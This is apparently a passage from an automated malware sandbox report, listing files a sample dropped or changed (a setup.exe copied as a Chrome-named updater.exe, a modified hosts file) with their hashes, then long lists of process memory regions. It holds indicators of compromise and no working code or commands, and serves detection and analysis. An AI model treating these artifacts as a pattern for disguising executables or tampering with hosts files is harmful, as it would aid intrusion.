                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • C:\Windows\system32\drivers\etc\hosts
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  f3f6968a4c0f457f427eb17f7cc5f68b

                                                  SHA1

                                                  872933578f4b7d555158189ed02015f192daa7c6

                                                  SHA256

                                                  774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                  SHA512

                                                  5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                                • \??\PIPE\srvsvc
                                                  MD5

                                                  d41d8cd98f00b204e9800998ecf8427e

                                                  SHA1

                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                  SHA256

                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                  SHA512

                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                • \Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • \Windows\Temp\setup.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • memory/112-156-0x0000000000820000-0x0000000000826000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/112-109-0x0000000000000000-mapping.dmp
                                                • memory/268-97-0x0000000000000000-mapping.dmp
                                                • memory/364-89-0x0000000000000000-mapping.dmp
                                                • memory/508-96-0x0000000000000000-mapping.dmp
                                                • memory/508-166-0x0000000001230000-0x0000000001E9D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/508-118-0x0000000001230000-0x0000000001E9D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/616-95-0x0000000000000000-mapping.dmp
                                                • memory/616-101-0x0000000000000000-mapping.dmp
                                                • memory/648-146-0x0000000000000000-mapping.dmp
                                                • memory/648-81-0x0000000000000000-mapping.dmp
                                                • memory/648-154-0x0000000000000000-mapping.dmp
                                                • memory/756-149-0x0000000000000000-mapping.dmp
                                                • memory/792-59-0x0000000000000000-mapping.dmp
                                                • memory/808-144-0x0000000000000000-mapping.dmp
                                                • memory/820-75-0x000007FEECC40000-0x000007FEED79D000-memory.dmp
                                                  Filesize

                                                  11.4MB

                                                • memory/820-78-0x00000000028D4000-0x00000000028D7000-memory.dmp
                                                  Filesize

                                                  12KB

                                                • memory/820-79-0x00000000028DB000-0x00000000028FA000-memory.dmp
                                                  Filesize

                                                  124KB

                                                • memory/820-77-0x000000001B780000-0x000000001BA7F000-memory.dmp
                                                  Filesize

                                                  3.0MB

                                                • memory/820-76-0x00000000028D4000-0x00000000028D7000-memory.dmp
                                                  Filesize

                                                  12KB

                                                • memory/820-108-0x0000000000000000-mapping.dmp
                                                • memory/820-74-0x000007FEED7A0000-0x000007FEEE1C3000-memory.dmp
                                                  Filesize

                                                  10.1MB

                                                • memory/820-72-0x0000000000000000-mapping.dmp
                                                • memory/824-142-0x0000000000000000-mapping.dmp
                                                • memory/888-83-0x0000000000000000-mapping.dmp
                                                • memory/888-132-0x0000000000000000-mapping.dmp
                                                • memory/972-85-0x0000000000000000-mapping.dmp
                                                • memory/1028-120-0x00000000772E0000-0x0000000077489000-memory.dmp
                                                  Filesize

                                                  1.7MB

                                                • memory/1028-117-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1028-71-0x0000000000000000-mapping.dmp
                                                • memory/1028-115-0x0000000000000000-mapping.dmp
                                                • memory/1028-119-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1028-121-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1028-122-0x00000000772E0000-0x0000000077489000-memory.dmp
                                                  Filesize

                                                  1.7MB

                                                • memory/1044-152-0x0000000000000000-mapping.dmp
                                                • memory/1044-143-0x0000000000000000-mapping.dmp
                                                • memory/1072-110-0x0000000000000000-mapping.dmp
                                                • memory/1108-134-0x0000000000000000-mapping.dmp
                                                • memory/1108-151-0x0000000000000000-mapping.dmp
                                                • memory/1108-107-0x0000000000000000-mapping.dmp
                                                • memory/1144-150-0x0000000000000000-mapping.dmp
                                                • memory/1232-113-0x0000000000000000-mapping.dmp
                                                • memory/1264-140-0x0000000000000000-mapping.dmp
                                                • memory/1264-82-0x0000000000000000-mapping.dmp
                                                • memory/1348-172-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-168-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-180-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-174-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-183-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-176-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-182-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-186-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-170-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-177-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-167-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-198-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-190-0x00000000000F0000-0x0000000000110000-memory.dmp
                                                  Filesize

                                                  128KB

                                                • memory/1348-189-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1348-188-0x0000000140000000-0x0000000140803000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/1360-67-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1360-66-0x00000000772E0000-0x0000000077489000-memory.dmp
                                                  Filesize

                                                  1.7MB

                                                • memory/1360-64-0x00000000772E0000-0x0000000077489000-memory.dmp
                                                  Filesize

                                                  1.7MB

                                                • memory/1360-63-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1360-56-0x0000000000000000-mapping.dmp
                                                • memory/1360-65-0x0000000000400000-0x000000000106D000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/1452-54-0x0000000075EF1000-0x0000000075EF3000-memory.dmp
                                                  Filesize

                                                  8KB

                                                • memory/1552-84-0x0000000000000000-mapping.dmp
                                                • memory/1560-133-0x0000000000000000-mapping.dmp
                                                • memory/1608-136-0x0000000000000000-mapping.dmp
                                                • memory/1612-94-0x0000000000000000-mapping.dmp
                                                • memory/1616-68-0x0000000000230000-0x000000000064C000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/1616-70-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp
                                                  Filesize

                                                  8KB

                                                • memory/1616-138-0x0000000000000000-mapping.dmp
                                                • memory/1616-69-0x000000001B9F0000-0x000000001BE0C000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/1628-197-0x0000000000060000-0x0000000000067000-memory.dmp
                                                  Filesize

                                                  28KB

                                                • memory/1628-195-0x00000000001D0000-0x00000000001D6000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/1636-87-0x0000000000000000-mapping.dmp
                                                • memory/1640-104-0x0000000000000000-mapping.dmp
                                                • memory/1668-92-0x0000000000000000-mapping.dmp
                                                • memory/1688-130-0x0000000001254000-0x0000000001257000-memory.dmp
                                                  Filesize

                                                  12KB

                                                • memory/1688-128-0x000007FEECB60000-0x000007FEED583000-memory.dmp
                                                  Filesize

                                                  10.1MB

                                                • memory/1688-131-0x000000000125B000-0x000000000127A000-memory.dmp
                                                  Filesize

                                                  124KB

                                                • memory/1688-129-0x000007FEEC000000-0x000007FEECB5D000-memory.dmp
                                                  Filesize

                                                  11.4MB

                                                • memory/1688-139-0x0000000000000000-mapping.dmp
                                                • memory/1688-125-0x0000000000000000-mapping.dmp
                                                • memory/1688-148-0x0000000000000000-mapping.dmp
                                                • memory/1752-80-0x0000000000000000-mapping.dmp
                                                • memory/1760-106-0x0000000000000000-mapping.dmp
                                                • memory/1760-86-0x0000000000000000-mapping.dmp
                                                • memory/1764-165-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-159-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-158-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-163-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-162-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-161-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-194-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1764-157-0x0000000000400000-0x000000000040C000-memory.dmp
                                                  Filesize

                                                  48KB

                                                • memory/1772-137-0x0000000000000000-mapping.dmp
                                                • memory/1796-98-0x0000000000000000-mapping.dmp
                                                • memory/1796-124-0x0000000000000000-mapping.dmp
                                                • memory/1796-90-0x0000000000000000-mapping.dmp
                                                • memory/1824-58-0x0000000000000000-mapping.dmp
                                                • memory/1840-153-0x0000000000000000-mapping.dmp
                                                • memory/1840-145-0x0000000000000000-mapping.dmp
                                                • memory/1840-135-0x0000000000000000-mapping.dmp
                                                • memory/1864-93-0x0000000000000000-mapping.dmp
                                                • memory/1864-100-0x0000000000000000-mapping.dmp
                                                • memory/1864-112-0x0000000000000000-mapping.dmp
                                                • memory/1920-102-0x0000000000000000-mapping.dmp
                                                • memory/1920-147-0x0000000000000000-mapping.dmp
                                                • memory/1932-91-0x0000000000000000-mapping.dmp
                                                • memory/1952-99-0x0000000000000000-mapping.dmp
                                                • memory/1968-105-0x0000000000000000-mapping.dmp
                                                • memory/1980-103-0x0000000000000000-mapping.dmp
                                                • memory/1996-88-0x0000000000000000-mapping.dmp
                                                • memory/2000-141-0x0000000000000000-mapping.dmp